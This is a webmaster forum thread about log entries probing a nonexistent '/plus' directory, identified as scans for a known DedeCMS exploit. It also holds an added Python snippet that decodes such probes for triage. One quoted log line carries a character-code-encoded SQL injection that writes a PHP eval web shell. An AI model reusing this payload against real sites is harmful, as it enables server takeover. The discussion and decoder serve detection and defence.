SSL Error Log messages - "plus" directory

     
5:30 pm on Dec 22, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


Seeking help/information on this SSL error:

[Mon Dec 22 04:59:19 2014] [error] [client xxx.xx.xxx.xxx] File does not exist: /home/domains/xxx.com/webroot/plus

What is with the "plus" directory calls? I have seen a lot of these.
7:35 am on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


I haven't seen that error message before. Is the client IP in the log file an address of a known computer, or are they random?
8:37 am on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


It looks like it may be some sort of script. Trace goes to China on some, others Australia. There will be calls from the same IP maybe 4 times within a minute, then 4 or 5 more a few minutes later.

In the ssl_request_log the IPs do a call for (example):

[22/Dec/2014:09:16:07 -0600] xx.xxx.xx.xx TLSv1 DES-CBC3-SHA "GET /plus/mytag_js.php?aid=19015 HTTP/1.1" 12010

and:

[22/Dec/2014:10:10:15 -0600] xx.xxx.xx.xx TLSv1 DES-CBC3-SHA "GET /plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=49&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=53&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=119&arrs2[]=119&arrs2[]=119&arrs2[]=46&arrs2[]=101&arrs2[]=55&arrs2[]=120&arrs2[]=117&arrs2[]=101&arrs2[]=46&arrs2[]=99&arrs2[]=111&arrs2[]=109&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 HTTP/1.1" 12010

Just installed SSL last week and was doing some log checks and wondered what it is. Script kiddies? Scraper?
9:37 am on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


These probes are looking for a known exploit in the DedeCMS website package. As your site doesn't have a /plus directory, you are not using DedeCMS and therefore are not vulnerable to this specific attack. DedeCMS is a Chinese CMS package and is used in a number of Asian countries, which may be the reason that most of your attacks seem to come from the Asia-Pacific region.
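
As an added example that is not part of the original thread: the `arrs1[]`/`arrs2[]` parameters in the request quoted above are decimal character codes, so a log check can decode them to show what a probe was sending, even when the target file does not exist. The sample lines are constructed, and the marker list and function names are assumptions.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# ssl_request_log layout as quoted in the thread:
# [time] client protocol cipher "METHOD target HTTP/x" bytes
LINE_RE = re.compile(r'^\[[^\]]+\] (?P<client>\S+) \S+ \S+ "\S+ (?P<target>\S+) [^"]*"')

# Assumed marker list: strings worth an alert once the codes are decoded.
MARKERS = ("eval(", "file_put_contents", "$_post", "<?php")

def decode_numeric_arrays(target):
    """Decode name[]=NN query parameters as character codes, grouped by name."""
    groups = {}
    for key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if key.endswith("[]") and value.isascii() and value.isdigit() and len(value) <= 7:
            code = int(value)
            if code < 0x110000:  # highest valid Unicode code point + 1
                groups.setdefault(key[:-2], []).append(chr(code))
    return {name: "".join(chars) for name, chars in groups.items()}

def triage(line, min_codes=4):
    """Return a finding for one log line, or None if it carries no encoded array."""
    m = LINE_RE.match(line)
    if not m:
        return None
    decoded = {k: v for k, v in decode_numeric_arrays(m["target"]).items()
               if len(v) >= min_codes}
    if not decoded:
        return None
    hits = sorted({mk for text in decoded.values() for mk in MARKERS if mk in text.lower()})
    return {"client": m["client"], "path": urlsplit(m["target"]).path,
            "decoded": decoded, "markers": hits}

def scan(lines):
    """Triage every line and keep only the findings."""
    return [f for f in map(triage, lines) if f is not None]

# Constructed sample lines (documentation addresses, harmless values).
SAMPLE_LOG = """\
[22/Dec/2014:10:10:15 -0600] 192.0.2.10 TLSv1 DES-CBC3-SHA "GET /plus/download.php?open=1&arrs1[]=100&arrs1[]=101&arrs1[]=109&arrs1[]=111&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40 HTTP/1.1" 12010
[22/Dec/2014:10:11:02 -0600] 192.0.2.11 TLSv1 DES-CBC3-SHA "GET /index.php?page=2 HTTP/1.1" 5120
"""

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG.splitlines()):
        print(finding)
```

A finding with an empty `markers` list still deserves a look, since the decoded text is reported either way.
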
12:34 pm on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


Thanks! I appreciate the answer!

Marc

PS: I should have put the long string in BBCode's "code" so it wouldn't spread the thread. Tried to edit but I assume it's past the time allowed for an edit. My bad. Sorry about that.
12:51 pm on Dec 23, 2014 (gmt 0)

Senior Member from KZ 

WebmasterWorld Senior Member lammert is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Jan 10, 2005
posts: 2951
votes: 33


Your post wraps correctly in IE 11, but it looks awkward in Chrome. It might be possible to fix this with a CSS change. I filed a bug report about your post to the admins; maybe they can use that post to come up with a permanent solution for wrapping of long lines.
1:15 pm on Dec 23, 2014 (gmt 0)

Senior Member from FR 

WebmasterWorld Senior Member leosghost is a WebmasterWorld Top Contributor of All Time 10+ Year Member Top Contributors Of The Month

joined:Feb 15, 2004
posts: 7139
votes: 412


String also "wraps" OK in FF28 on Linux... maybe just a Chrome "bug" (I mean Chrome "thing")?
3:54 pm on Dec 23, 2014 (gmt 0)

Junior Member from US 

10+ Year Member

joined:Apr 4, 2004
posts: 186
votes: 7


To clarify - I'm on OS X and was viewing in Safari. Just checked in Firefox and it wraps correctly. In Chrome it "sorta" wraps. Opera doesn't handle it well either.